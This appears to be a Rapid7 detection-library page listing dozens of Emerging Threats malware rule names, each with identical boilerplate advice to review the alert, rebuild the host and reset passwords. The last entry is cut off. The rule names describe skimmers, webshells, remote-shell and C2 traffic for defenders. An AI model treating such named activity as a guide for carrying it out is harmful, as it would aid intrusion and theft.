This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible FakeAV Binary Download (Security)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Fake AV Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible FoggyWeb Backdoor Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible FortDisco Reporting Hacked Accounts

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Gamaredon HEAD Request for .dot file on ddns.net

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Generic RAT over Telegram API

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Godzilla Loader Base64 Filename

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Graftor EXE Download Common Header Order

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IceRat CnC Acitivty

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible iKittens OSX MacDownloader CNC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible IndigoDrop/Cobalt Strike Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M1 (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M2 (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M3 (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M4 (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible IoT_reaper ELF Binary Request M5 (set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Java/Downloader Observed in Pawn Storm CVE-2015-2590 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Java/Downloader Observed in Pawn Storm CVE-2015-2590 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible JKDDOS download cl.exe

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible JKDDOS download ddos.exe

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kaseya VSA Exploit Activity Inbound M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kaseya VSA Exploit Activity Inbound M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kaseya VSA Exploit URI Structure Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kelihos.F EXE Download Common Structure

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kelihos.F EXE Download Common Structure 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kelihos Infection Executable Download With Malformed Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Kimsuky APT Connectivity Check via Document

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible KONNI CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Konni Encrypted Stage 2 Payload Inbound via HTTP

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible KONNI URI Path Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Linux/Cdorked.A CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Linux/Cdorked.A Incoming Command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Locky VB/JS Loader Download Sep 08 2017

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Magecart Credit Card Information JS Script

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Maldoc Downloader Aug 18 2017

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Maldoc Downloading EXE Jul 26 2016

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible MalDoc Payload Download Nov 11 2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Maldoc Retrieving Dridex from pastebin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible MalDoc Retrieving Payload 2021-07-19

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible MalDoc Retrieving Payload 2021-11-01

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Invoice EXE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro DL BIN May 2016 (No UA)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro DL EXE Feb 2016

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro DL EXE Feb 2016 (WinHTTPRequest)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro DL EXE May 2016 (Mozilla compatible)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Macro EXE DL AlphaNumL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicious Tor Module Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicous Macro DL EXE Jul 01 2016 (dll generic custom headers)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Malicous Macro DL EXE Jul 01 2016 (userdir dotted quad)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Mask C2 Traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible MSIL/Solorigate.G!dha/SUPERNOVA Webshell Access Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible NGLite Backdoor C2 Traffic (NKN)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible OceanLotus C2 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Outbound WebShell GIF

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Outbound WebShell JPEG

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible PHP.MAILER WebShell Generic Request Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible PHP.MAILER WebShell Register Shutdown Function Request Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer CnC Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pipka JS Skimmer - Skimmer Payload Observed M7

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible PlugX Common Header Struct

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Ponmocup Driveby Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pony DLL Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Pony Payload DL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible PowerShell Empire Activity Outbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Puzzlemaker Remote Shell Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Ransomware HTTP POST to Onion Link Domain

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Possible Rar’d Malware sent when remote host claims to send an Image

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible ReactorBot .bin Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Red October proxy CnC 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Red October proxy CnC 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Red October proxy CnC 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Schneebly Posting ScreenShot

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sharik/Smoke Loader 7zip Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sharik/Smoke Loader Microsoft Connectivity check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sharik/Smoke Loader Microsoft Connectivity check M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sharik/Smoke Loader Microsoft Connectivity check M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Sinkhole banner

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible SKyWIper/Win32.Flame POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible SQUIRRELWAFFLE Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible STEADYPULSE Webshell Accessed M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible STEADYPULSE Webshell Accessed M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Stitur Secondary Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TDSS User-Agent CMD

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TickGroup Casper CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TickGroup Coolbee/Avenger CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TickGroup Snack CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Tracur.Q HTTP Communication

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TransparentTribe APT CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible T-RAT Encrypted Zip Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible TRAT proxy component user agent detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Trojan.APT.9002 POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Tunna Proxy Activity (Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Tunna Proxy Closing Connection

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Turla Carbon Paper CnC Beacon (Fake User-Agent)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible UNC1878 Cobalt Strike CnC SSL Cert Inbound (Mountainvew)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible UNC1878/FIN12 Cobalt Strike CnC SSL Cert Inbound (lol)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible UNC1878/FIN12 Cobalt Strike CnC SSL Cert Inbound (office)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible UNC1878/FIN12 Cobalt Strike CnC SSL Cert Inbound (Texsa)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Upatre Downloader SSL certificate

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Upatre or Dyre SSL Cert Jan 22 2015

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible W32/KanKan tools.ini Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible W32/KanKan Update officeaddinupdate.xml Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible W32/VBKlip BAN Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32.Bicololo Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Dimegup.A Downloading Image Common URI Struct

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Gapz MSIE 9 on Windows NT 5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Get2 Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Hupigon ip.txt with a Non-Mozilla UA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Napolar.A URL Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Win32/Petya Conn Check

Description

